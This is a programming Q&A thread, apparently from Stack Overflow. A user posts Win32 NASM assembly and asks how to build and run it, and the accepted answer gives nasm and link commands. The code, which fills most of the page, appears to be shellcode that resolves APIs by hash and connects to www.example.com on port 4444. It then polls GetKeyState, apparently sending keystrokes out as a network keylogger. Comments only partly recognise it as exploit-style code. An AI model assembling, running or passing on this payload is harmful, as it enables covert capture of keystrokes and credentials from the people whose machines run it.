# How can I compile / execute the following code on Windows 7 32 Bit?

Tags: windows, compilation, execute, machine-code

Can you tell me how I can execute this code on a windows 7 32bit machine?
Do I need to compile it? If yes, how should I do this?
Which ending (.exe) should the file have?

```
section .bss

section .data

section .text
   global _start
      _start:
    cld
    call dword loc_88h
    pushad
    mov ebp,esp 
    xor eax,eax
    mov edx,[fs:eax+0x30]
    mov edx,[edx+0xc]
    mov edx,[edx+0x14]
    loc_15h:
    mov esi,[edx+0x28]
    movzx ecx,word [edx+0x26]
    xor edi,edi
loc_1eh:
    lodsb
    cmp al,0x61
    jl loc_25h
    sub al,0x20
loc_25h:
    ror edi,byte 0xd
    add edi,eax
    loop loc_1eh
    push edx
    push edi
    mov edx,[edx+0x10]
    mov ecx,[edx+0x3c]
    mov ecx,[ecx+edx+0x78]
    jecxz loc_82h
    add ecx,edx
    push ecx
    mov ebx,[ecx+0x20]
    add ebx,edx
    mov ecx,[ecx+0x18]
loc_45h:
    jecxz loc_81h
    dec ecx
    mov esi,[ebx+ecx*4]
    add esi,edx
    xor edi,edi
loc_4fh:
    lodsb
    ror edi,byte 0xd
    add edi,eax
    cmp al,ah
    jnz loc_4fh
    add edi,[ebp-0x8]
    cmp edi,[ebp+0x24]
    jnz loc_45h
    pop eax 
    mov ebx,[eax+0x24]
    add ebx,edx
    mov cx,[ebx+ecx*2]
    mov ebx,[eax+0x1c]
    add ebx,edx
    mov eax,[ebx+ecx*4]
    add eax,edx
    mov [esp+0x24],eax
    pop ebx
    pop ebx
    popad
    pop ecx
    pop edx
    push ecx
    jmp eax
loc_81h:
    pop edi
loc_82h:
    pop edi
    pop edx
    mov edx,[edx]
    jmp short loc_15h
loc_88h:
    pop ebp
    push dword 0x3233 
    push dword 0x5f327377
    push esp
    push dword 0x726774c
    call ebp
    mov eax,0x190
    sub esp,eax
    push esp
    push eax
    push dword 0x6b8029
    call ebp
    push byte +0x10
    jmp dword loc_1ceh
loc_b2h:
    push dword 0x803428a9
    call ebp
    lea esi,[eax+0x1c]
    xchg esi,esp
    pop eax
    xchg esp,esi
    mov esi,eax
    push dword 0x6c6c
    push dword 0x642e7472
    push dword 0x6376736d
    push esp
    push dword 0x726774c
    call ebp
    jmp dword loc_1e3h
loc_dfh:
    push dword 0xd1ecd1f
    call ebp
    xchg ah,al
    ror eax,byte 0x10
    inc eax
    inc eax
    push esi
    push eax
    mov esi,esp
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    inc eax
    inc eax
    push eax
    push eax
    push dword 0xe0df0fea
    call ebp
    mov edi,eax
loc_104h:
    push byte +0x10
    push esi
    push edi
    push dword 0x6174a599
    call ebp
    test eax,eax
    jz loc_122h
    dec dword [esi+0x8]
    jnz loc_104h
    xor eax,eax
    push eax
    push dword 0x56a2b5f0
    call ebp
loc_122h:
    push dword 0x3233
    push dword 0x72657375
    push esp
    push dword 0x726774c
    call ebp
    push dword 0x657461
    push dword 0x74537965
    push dword 0x4b746547
    push esp
    push eax
    push dword 0x7802f749
    call ebp
    push esi
    push edi
    push eax
    xor ecx,ecx
    mov esi,ecx
    mov cl,0x8
loc_155h:
    push esi
    loop loc_155h
loc_158h:
    xor ecx,ecx
    xor esi,esi
    push byte +0x8
    push dword 0xe035f044
    call ebp
loc_165h:
    mov eax,esi
    cmp al,0xff
    jnc loc_158h
    inc esi
    push esi
    call dword [esp+0x24]
    mov edx,esi
    xor ecx,ecx
    mov cl,0x80
    and eax,ecx
    xor ecx,ecx
    cmp eax,ecx
    jnz loc_18fh
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    btr [esp+eax*4],edx
    jmp short loc_165h
loc_18fh:
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bt [esp+eax*4],edx
    jc loc_165h
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bts [esp+eax*4],edx
    push esi
    push byte +0x10
    push dword [esp+0x30]
    push byte +0x0
    push byte +0x1
    lea ecx,[esp+0x10]
    push ecx
    push dword [esp+0x3c]
    push dword 0xdf5c9d75
    call ebp
    lea esp,[esp+0x4]
    jmp short loc_158h
loc_1ceh:
    call dword loc_b2h
    db "www.example.com",0
loc_1e3h:
    call dword loc_dfh
    db "4444",0
```

Answer (score 1, accepted):

This looks like 32-bit [NASM](http://www.nasm.us) assembly code([A simple beginners introduction](http://web.archive.org/web/20100529113659/http://home.comcast.net/~fbkotler/clueless.html)). You can *assemble* it (not *compile* it) with [this installer](http://www.nasm.us/pub/nasm/releasebuilds/2.12.02/win32/nasm-2.12.02-installer-x86.exe) from the NASM website (version 2.12.02 at the time of this answer).

Assembling and linking it on Windows 7 works like this:

If you have the Microsoft C compiler, you have (somewhere) the linker from Microsoft named `link.exe`. If you don’t, you can download the [Windows 7 SDK](https://www.microsoft.com/en-us/download/details.aspx?id=3138&fa43d42b-25b5-4a42-fe9b-1634f450f5ee=True), which provides the C compiler and linker(`link.exe`).

```
nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib
```

But a quick glance over the code makes obvious that there are *NO* obviously named API calls in it, so the destination platform(Windows, Linux, MacOS, other) is difficult to determine. So this code may assemble, but its execution may(!) be useless(unless run in a debugger) nevertheless.

Comment: There are API calls in it, but they're using addresses not symbolic names.  The original code most likely was obtained by disassembling an in-memory image after the loader performed fixups.  And yes, the platform is difficult to determine.

Comment: @BenVoigt: Yes, there could be API calls in it. Otherwise it can be an unknown OS. If it'd be Linux, I guess that there'd be some `int 0x80` in it. It doesn't seem to be Windows, either. These `call ebp`s appear rather strange to me, but this is beyond the scope of this question.

Comment: The `call ebp` seems to indicate that it might be a buffer overflow exploit

Comment: This is definitely a Win32 program. The code shortly after `_start` is accessing the `LDR_DATA_TABLE_ENTRY` (by way of the `TIB` and `PEB`).  It appears to be looking up APIs in `ws2_32` (that's the string being pushed onto the stack by the `push dword 0x3233` and `push dword 0x5f327377` instructions), `msvcrt.dll`, etc.  I haven't looked further into it yet.

Comment: @MichaelBurr: Thank you very much for your experienced view on this code. But please appreciate that I haven't looked further into dissecting the details of this code because IMHO it was beyond the scope of this question.